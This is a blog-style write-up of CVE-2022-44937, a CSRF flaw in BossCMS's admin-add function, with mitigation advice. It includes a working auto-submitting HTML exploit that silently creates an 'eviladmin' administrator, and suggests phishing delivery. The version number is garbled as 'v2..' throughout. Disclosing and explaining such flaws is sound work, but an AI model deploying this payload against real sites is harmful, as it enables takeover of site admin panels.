CVE-2022-44937 - Exploiting CSRF in BossCMS v2.. Administrator List Add Function
In late 2022, cybersecurity researchers discovered a cross-site request forgery (CSRF) vulnerability in BossCMS v2... This CVE, CVE-2022-44937, exposes a critical flaw in the Administrator List’s Add function, putting website admin panels at risk. In this article, we’ll break down what CSRF is, show you exactly how this bug works, and provide a code snippet demonstrating an exploit. Whether you’re a developer, site owner, or just interested in security, this guide gives you a clear, hands-on look at the vulnerability.
What is BossCMS?
BossCMS is an open-source content management system popular in some East Asian tech communities. It boasts a clean interface and relatively simple code, making it a target for both web designers and attackers.
Understanding CSRF
Cross-Site Request Forgery (CSRF) lets attackers trick logged-in users into submitting unintended requests. Imagine you’re logged in as admin on your website—and someone gets you to click a malicious link. If the site isn’t protected, that link might silently perform admin actions like creating new users without your permission.
What’s Vulnerable in BossCMS v2..?
The problem lies in the Administrator List module’s *Add function*, which lets admins add new admin accounts.
The issue: BossCMS does not require anti-CSRF tokens for this action. This means a hacker can craft a hidden form to add a new administrator. If a logged-in admin opens a malicious website or email, the attack happens in the background.
Demonstrating the Exploit
Suppose an attacker wants to create a new admin with username "eviladmin" and password "badpassword". Here’s the attack in action.
The attacker puts this HTML on a site they control
<!DOCTYPE html>
<html lang="en">
<body>
<form id="exploit" action="http://victim-bosscms.com/admin/admin/add.html"; method="POST">
<input type="hidden" name="username" value="eviladmin">
<input type="hidden" name="password" value="badpassword">
<input type="hidden" name="repassword" value="badpassword">
<input type="hidden" name="email" value="evil@attacker.com">
<input type="hidden" name="roleid" value="1"> <!-- Assuming '1' is an admin role -->
</form>
<script>
document.getElementById('exploit').submit();
</script>
</body>
</html>
How it works:
If an admin at victim-bosscms.com is logged in and visits this page, the browser submits the form to their site, adding a new admin named "eviladmin".
Step 2: Wait for a Visit
Attackers might send a phishing email, pop up a malicious ad, or hide this code inside a compromised forum post.
Why This Works
BossCMS v2.. does not check for a CSRF token (unique per user/session). There’s no check that the request came from the admin’s own actions, not a sneaky website.
Sensitive forms are actioned via POST, but with no token fields
- Actions work just by sending expected field names—nothing unique per session/user
## Fix / Mitigation
To protect against CSRF
- Add a CSRF token to each admin action form (a random string stored in the session and echoed in the HTML)
Example of CSRF token in a form
<input type="hidden" name="csrftoken" value="randomly_generated_token">
References
- CVE-2022-44937 on NVD
- Original disclosure on GitHub
- BossCMS repo (might change over time)
- OWASP Cross-Site Request Forgery (CSRF) page
Conclusion
CVE-2022-44937 is a classic, yet dangerous CSRF vulnerability in BossCMS v2..’s admin-user-adding functionality. This bug shows how even trusted control panels can be hijacked if basic protections are skipped.
If you use BossCMS, update to a patched version or implement CSRF tokens yourself—otherwise attackers might turn your website against you, even while you’re just browsing the web.
Stay updated, stay secure! If you found this useful, consider sharing or checking your own favorite web apps for similar holes.
Timeline
Published on: 11/28/2022 21:15:00 UTC
Last modified on: 12/01/2022 23:12:00 UTC